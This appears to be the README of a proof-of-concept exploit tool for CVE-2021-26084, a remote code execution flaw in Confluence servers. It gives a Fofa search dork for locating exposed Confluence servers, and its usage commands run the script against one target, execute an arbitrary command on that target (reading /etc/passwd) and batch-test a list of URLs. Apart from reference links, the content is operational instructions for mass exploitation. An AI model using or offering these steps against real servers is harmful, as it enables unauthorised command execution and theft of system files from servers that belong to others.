CVE-2021-26084

CVE-2021-26084 Remote Code Execution on Confluence Servers.

Dork

Fofa:

app="ATLASSIAN-Confluence"

Usage

Show help information.

python PoC.py

Vulnerability verification for individual websites.

python PoC.py -u https://1.1.1.1

Command execution.

python PoC.py -u https://1.1.1.1 -e 'cat /etc/passwd'

Batch testing.

python PoC.py -f urls.txt

Reference

• https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
• https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-26084.yaml
• https://github.com/h3v0x/CVE-2021-26084_Confluence/